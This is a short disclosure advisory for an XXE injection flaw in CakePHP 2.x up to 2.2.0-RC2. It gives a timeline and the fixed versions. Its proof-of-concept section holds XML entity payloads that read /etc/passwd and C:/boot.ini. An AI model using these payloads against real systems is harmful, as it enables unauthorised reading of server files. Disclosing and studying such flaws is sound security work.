Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
CakePHP 2.x-2.2.0-RC2 XXE Injection

Date: Mon Jul 16 2012 - 08:33:43 CDT

# Exploit title: CakePHP XXE injection
# Date: 01.07.2012
# Software Link: http://www.cakephp.org
# Vulnerable version: 2.x - 2.2.0-RC2
# Tested on: Windows and Linux
# Author: Pawel Wylecial
# http://h0wl.pl
1. Background
Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."
2. Vulnerability
CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion.
3. Proof of Concept
<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///etc/passwd" >]>
<!DOCTYPE cakephp [
  <!ENTITY payload SYSTEM "file:///C:/boot.ini" >]>
4. Fix
Fix applied in version 2.2.1 and 2.1.5. See official security release:
5. Timeline
1.07.2012 - vulnerability reported
13.07.2012 - response from CakePHP
14.07.2012 - confirmed and fix release